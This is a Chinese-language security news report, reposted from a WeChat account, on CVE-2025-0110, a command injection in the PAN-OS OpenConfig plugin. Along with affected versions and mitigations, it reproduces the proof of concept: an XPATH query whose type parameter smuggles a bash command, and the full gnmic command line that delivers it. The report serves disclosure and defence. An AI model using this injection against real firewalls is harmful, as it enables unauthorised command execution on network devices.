一名 Google 研究人员披露了Palo Alto Networks PAN-OS 防火墙软件漏洞 (CVE-2025-0110) 的详细信息和概念验证 (PoC) 漏洞利用。该漏洞的 CVSSv4 评分为 8.6(高),可能允许经过身份验证的攻击者以管理员权限在底层操作系统上执行任意命令。
该漏洞存在于 PAN-OS OpenConfig 插件中,该插件允许通过gnmi.Subscribe函数检索系统日志。通过操纵 OpenConfig API 请求中的 type 参数,攻击者可以在防火墙上注入并执行任意 bash 命令。
该漏洞是使用滥用 OpenConfig API 中的 XPATH 查询结构的特制请求触发的:
/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system > file1; cat file1)]利用gnmic工具-https://github.com/openconfig/gnmic,攻击者可以在PAN-OS设备上执行任意bash命令:
./gnmic -a <IP>:<PORT> -u <username> --password=<password> --skip-verify -e json_ietf subscribe --mode once --log --path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]'响应确认命令已成功执行,证明了系统对命令注入的敏感性。
该漏洞影响启用了 OpenConfig 插件的 PAN-OS 部署,包括:
-
PAN-OS 11.0.4 及更高版本(附带 OpenConfig 2.0.1+)
-
PAN-OS 10.2.11 及更高版本(附带 OpenConfig 2.0.2+)
OpenConfig API 可通过端口 9339 上的 PAN-OS 管理接口访问,一旦暴露将会带来巨大的安全风险。
Palo Alto Networks 已在 OpenConfig Plugin 版本 2.1.2 中发布了安全修复程序,该版本包含在 PAN-OS 11.2.5 及更高版本中。用户可以通过以下方式降低风险:
-
将 OpenConfig 插件更新至版本 2.1.2 或更高版本。
-
如果不需要,请禁用或卸载 OpenConfig 插件。
-
限制管理接口对可信网络的访问。
原文始发于微信公众号(Ots安全):Google 发布 PAN-OS 防火墙中 CVE-2025-0110 命令注入漏洞的 PoC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论